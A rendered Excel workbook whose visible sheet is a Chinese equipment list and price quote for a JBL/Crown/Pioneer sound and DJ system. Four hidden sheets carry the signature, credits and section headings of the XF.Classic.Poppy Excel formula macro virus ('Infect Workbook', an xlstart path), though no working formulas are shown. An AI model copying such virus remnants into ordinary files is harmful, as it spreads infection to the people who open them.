{"text_format":"3","workbook":"xls","n_sheets":5,"sheets":["设备总计","OIKDSEYN","YYHRMQPY","RRYPQNJS","RYYRMJLB"],"not_rendered":{"images":11,"external_links":40,"defined_names":190},"read":"whole","date_system":"1900","formulas":"cached_only"}

{"sheet":"设备总计","index":0,"n_rows":19,"n_cols":12,"rows_kept":19,"merged":[[0,0,0,11],[2,0,2,11],[18,1,18,8]],"flags":["formulas_cached_only"]}
["设备清单"]
["序号","设备名称","品牌","型号","技术参数","国别","单位","数量","单价","小计","类似图样","备注"]
["一、音响扩声系统"]
[1,"单十五主音箱","JBL","MD55","频率范围（-10 dB）：39 Hz - 20千赫额定功率：550 W（2200 W峰值）2小时覆盖模式：90×50，旋转波导频率响应（+ / - 3分贝）：51 Hz - 19千赫的指向性因数（Q）：11.6指向性指数（DI）：10.6分贝被动分频频率：1.8 kHz长期电力系统评级（IEC）：350 W（1400 W峰值），100小时最大SPL：125 dB SPL CONT AVG（131分贝峰值）系统的灵敏度：98 dB SPL，2.83v（1W）@ 1米（3.3英尺）系统阻抗：8欧姆\n\n尺寸：419.8×781.1×457.7毫米（16.5×18×30.8）净重：23.8公斤（52.5磅）","美国","只",12,13000,156000]
[2,"双十八低音音箱","JBL","MQ82S","双18英寸大功率长冲程低音单元\n精心设计的箱体结构，有效提高低频输出效率\n隐藏式接线板设计，便于在酒吧垂直或水平安装\n可旋转的JBL ENTERTAINMENT铭牌，便于垂直或水平安装\n1.8 mm厚扎实的钢质防护铁网，上面设计前卫的标志“8”象征活力和激情\n外形简洁、紧凑\n箱体使用18 mm厚的芬兰木夹板制作，表面采用Duraflex™喷漆处理\n系统：\n \n频率范围(-10 dB): 32 Hz – 200 Hz\n \n频率响应(±3 dB): 42 Hz – 200 Hz\n \n灵敏度(2.83V@ 1m): 103 dB\n \n额定阻抗: 4 ohms\n \n最大声压级输出: 132 dB (138 dB 峰值)\n \n额定输入功: (连续/音乐信号/峰值) 1400 W/2800 W/5600 W\n \n外型：\n \n外型尺寸(H x W x D): 627mm x 995mm x 740mm (24.7 英寸 x 39.2 英寸 x 29.1英寸)\n \n净重: 84Kg (185.2磅)\n \n低音单元: 2个18英寸低音单元\n \n输入连接器: 2个Neutrik® Speakon® NL4MP\n \n箱体结构: 采用18 mm厚的芬兰木夹板\n \n喷漆: 采用Duraflex™喷漆处理\n \n网罩: 黑色粉末涂层，1.8mm钢","美国","只",4,16800,67200]
[3,"2通道功放","CROWN","XLI3500","2*1000W 8欧，2*1350W 4欧立体声/并联/单声道桥接模式\n用户可选择的输入灵敏度：0.775V和1.4V\nRCA和XLR输入接口；Speakon®和喇叭接线柱输出接口\n2个增益控制旋钮，1个电源开关，1个电源LED灯，2组6个LED灯分别表示对应声道处于工作、削波和故障状态\n防止短路、空载、开/关机噪音、射频干扰保护电路","美国","台",10,5600,56000]
[4,"调音台","Soundcarft","FX16II","16路话筒线路输入,2编组,立体声输出,带LEXICON电子混响，带机架","英国","台",1,5350,5350]
[5,"数字处理器","ASHLY","DSP480  ","4进8出数字音频处理器","美国","台",1,9360,9360]
[6,"31路均衡处理器","DBX","231S","2*31段 均衡器,2U机，银色面板","美国","台",1,1660,1660]
[7,"电源时序器","声准","1018B","8路电源时序器","中国","台",3,720,2160]
[8,"无线手持话筒","SENNHEISER","EW115G3 ","单手持动圈（心型）","德国","套",2,3500,7000]
[9,"DJ打碟机","先锋","CDJ-900NEXUS","大液晶屏单CD打碟机,加强性专业级CD播放机，全新滚动模式和自动循环功能，扩大专业DJ表演的表现力。\n新开发的[Slip Mode]\n升级版[自动节拍循环]功能","日本","台",2,8970,17940]
[10,"混音台","先锋","DJM-900NEXUS","4路数字混音台,配置的高性能USB声卡可直接连接PC,全新的音效和直观的操作感，扩大了编曲的自由","日本","台",1,13570,13570]
[11,"DJ 耳机","先锋","HDJ500","Home DJ耳机系列，时尚外观，更多选择 （红、白、黑选择）","日本","台",1,690,690]
[12,"笔记本电脑",{"$nulls":4},"台",1,0,0,null,"自备"]
[13,"线材","高强信",null,"3平方",null,"米",500,4,2000]
[14,"辅材吊件",{"$nulls":4},"批",1,2000,2000]
[15,"机柜",null,null,"18U",null,"台",1,950,950]
[16,"合计",{"$nulls":7},341880]

{"sheet":"OIKDSEYN","index":1,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["海安全频音响.xlsm"]
["Book1"]
["C:\\PROGRA~1\\MICROS~2\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"}]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]

{"sheet":"YYHRMQPY","index":2,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["海安全频音响.xls"]
["Book1"]
["C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[3]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]

{"sheet":"RRYPQNJS","index":3,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["海安全频音响.xls"]
["Book1"]
["C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[3]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]

{"sheet":"RYYRMJLB","index":4,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["复件 海安全频音响.xls"]
["Book1"]
["C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"}]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]